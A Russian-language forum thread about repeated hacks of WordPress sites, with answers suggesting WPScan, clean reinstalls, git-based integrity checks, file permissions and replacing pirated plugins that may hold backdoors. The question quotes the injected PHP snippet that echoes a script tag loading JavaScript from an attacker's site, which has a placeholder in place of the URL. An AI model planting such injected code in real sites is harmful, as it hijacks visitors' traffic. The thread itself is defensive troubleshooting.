Как закрыть дыру в WP?

Question

[erstet]

Всем привет! Периодически злоумышленники атакую сайты на Wordpress через какую-то дуру, в последствии чего гугл ругается и в хедере всех тем (в том числе и стандартных) появляется такой код (который как я понял ворует трафик..?)

<?php
#a913f8#
if(empty($euyue)) {
$euyue = "<script type=\"text/javascript\" src=\"http://сайт засранца который ведет на js"></script>";
echo $euyue;
}
#/a913f8#
?>

цифры что после # всегда разные, сайты редиректа тоже.
Устал уже бороться с этим, обновляю движок регулярно, за плагинами тоже слежу, единственное это то, что не все из них купленные...но не смотря ни на что хоть раз в месяц где - нибудь да "прыщик" вскочит.
Кто-нибудь сталкивался с такими же траблами если да, то что служило причиной, и каким методом закрыли дыру??
Может как-то запретить какие-либо изменения во всех файлах на сайте без моего вмешательства?
Поделитесь пожалуйста опытом или догадками..

Answer 1

[Никита Каменев]

WPScan в помощь. Чекни им, большинство паблик уязвимостей в WP есть в их базе

Comments

[erstet]

спасибо за совет, попробую.
Кстати пользовался Wordfence Security который должен как раз запрещать, отслеживать все изменения в файлах и т.п. но все равно проскакивало каким-то образом зло..)
Получал уведомление и уже автоматом убирал гадость и забивал... т.к. времени ковыряться в логах не было, я ничего так и не уяснил в чем и почему к сожалению, а сейчас вновь настигла эта участь(

Answer 2

[Vitaliy Orlov]

Сложно найти таблетку от всех напастей.

Самые сложные заразы, чистились установкой нового вордпресса, и переносом постов с помощью самописных скриптов.

Для защиты советую использовать git, в котором будет храниться не зараженная версия, лучше всего на стороннем сервере. Как результат, в случае модификации файлов, вы практически всегда сможете это обнаружить + откатиться на предыдущую не зараженну.ю копию.
Так же, если есть такая возможность, можно установить права на соответствующие файлы запрещающее их редактирование пользователем от которого работает веб-сервер.

Так же учтите, что вирус может к Вам проникать, не через ваш сайт, а через сайт соседей по хостингу (разумеется, если хостер оставил такую возможность).

Answer 3

[Марат]

wordpress.tv/2015/08/20/gennady-kovshenin-hacking-...

Answer 4

[Игорь Воротнёв]

за плагинами тоже слежу, единственное это то, что не все из них купленные...

Если вы имеете в виду, что они сп*жжены (занулены / вылечены от жадности) - тогда у вас в одном из этих "бесплатных" плагинов стоит бекдор, даю 9 из 10. Лечится заменой ворованного софта на честно приобретенный (либо бесплатный аналог)